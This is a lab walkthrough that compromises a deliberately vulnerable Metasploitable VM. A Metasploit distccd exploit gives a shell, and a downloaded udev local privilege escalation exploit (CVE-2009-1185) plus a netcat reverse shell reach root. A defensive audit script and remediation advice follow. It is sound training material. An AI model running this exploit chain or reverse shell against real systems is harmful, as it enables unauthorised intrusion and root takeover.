# Metasploitable (distccd + udev)

## Introduction

Metasploitable virtual machine (01, 02, 03, 04)
udev < 141 Local Privilege Escalation Exploit

## Execution

```text
# msfconsole
msf > nmap -sV -O -p 1-65535 192.168.1.50
[*] exec: nmap -sV -O -p 1-65535 192.168.1.50

Not shown: 65523 closed ports
PORT     STATE SERVICE
21/tcp   open  ftp
22/tcp   open  ssh
23/tcp   open  telnet
25/tcp   open  smtp
80/tcp   open  http
139/tcp  open  netbios-ssn
445/tcp  open  netbios-ssn
3306/tcp open  mysql
3632/tcp open  distccd
5432/tcp open  postgresql
8009/tcp open  ajp13
8180/tcp open  http
MAC Address: 08:00:27:F7:38:97 (Cadmus Computer Systems)
Device type: general purpose
Running: Linux 2.6.X
OS details: Linux 2.6.9 - 2.6.28
Network Distance: 1 hop
Service Info: Host:  metasploitable.localdomain; OSs: Unix, Linux

msf > search distccd
msf > use unix/misc/distcc_exec
msf exploit(distcc_exec) > show options
msf exploit(distcc_exec) > set rhost 192.168.1.50
msf exploit(distcc_exec) > show payloads
msf exploit(distcc_exec) > set payload cmd/unix/bind_ruby
# nc -vl 1234
msf exploit(distcc_exec) > exploit

[*] Started bind handler
[*] Command shell session 1 opened (192.168.1.100:56362 -> 192.168.1.50:4444)

uname -a
Linux metasploitable 2.6.24-16-server
whoami
daemon
wget http://www.exploit-db.com/download/8572
mv index.html cve-2009-1185.c
gcc -o cve-2009-1185 cve-2009-1185.c
echo "#!/bin/sh\n/bin/netcat -e /bin/sh 192.168.1.100 1234" > /tmp/run
ps axuf | grep udev | grep -v grep
root      2479  0.0  0.0   2104   708 ?        Ss  05:32   0:00 /sbin/udevd --daemon
./cve-2009-1185 2478 # =2479-1
# nc -vl 1234
Connection from 192.168.1.50 port 1234 [tcp/*] accepted
uname -a
Linux metasploitable 2.6.24-16-server
whoami
root
```
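The chain above depends on two conditions: a distccd listener reachable from the network, and a udev older than 141 (CVE-2009-1185). The audit helper below is an added example, not part of the original write-up; it checks both conditions from the text of `udevadm --version` and `ss -ltn` (assumed to be present on the audited host) and embeds constructed sample inputs so it also runs offline.

```shell
#!/bin/sh
# Added audit helper (not from the original write-up). It flags the two
# conditions the walkthrough above relies on:
#   1. udev older than 141 (CVE-2009-1185, the udev netlink bug), and
#   2. a distccd listener bound to a non-loopback address on TCP 3632.

# udev_vulnerable VERSION_STRING -> returns 0 if the udev release is < 141.
# udev releases are plain integers ("117", "249"); anything after the
# leading digits is discarded.
udev_vulnerable() {
    v=$(printf '%s' "$1" | sed 's/[^0-9].*//')
    [ -n "$v" ] && [ "$v" -lt 141 ]
}

# distcc_exposed SS_OUTPUT -> returns 0 if a LISTEN socket on port 3632 is
# bound to anything other than 127.0.0.1 or [::1]. Input is the text of
# `ss -ltn` (header line included).
distcc_exposed() {
    printf '%s\n' "$1" | awk '
        $1 == "LISTEN" && $4 ~ /:3632$/ {
            addr = $4; sub(/:[0-9]+$/, "", addr)
            if (addr != "127.0.0.1" && addr != "[::1]") found = 1
        }
        END { exit found ? 0 : 1 }'
}

# Constructed sample inputs (not captured from a real host).
SAMPLE_SS_EXPOSED='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      10     0.0.0.0:3632        0.0.0.0:*
LISTEN 0      128    127.0.0.1:3306      0.0.0.0:*'
SAMPLE_SS_LOOPBACK='State  Recv-Q Send-Q Local Address:Port  Peer Address:Port
LISTEN 0      10     127.0.0.1:3632      0.0.0.0:*'

# Live check, only when the tools exist on this host.
if command -v udevadm >/dev/null 2>&1; then
    ver=$(udevadm --version 2>/dev/null)
    if udev_vulnerable "$ver"; then echo "udev $ver: VULNERABLE (< 141)"
    else echo "udev $ver: ok"; fi
fi
if command -v ss >/dev/null 2>&1; then
    if distcc_exposed "$(ss -ltn 2>/dev/null)"; then echo "distccd: EXPOSED on 3632"
    else echo "distccd: not exposed"; fi
fi
```

Fixing either condition breaks the chain: upgrade udev to 141 or later, and stop distccd or restrict it to trusted build hosts with its `--allow` option.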
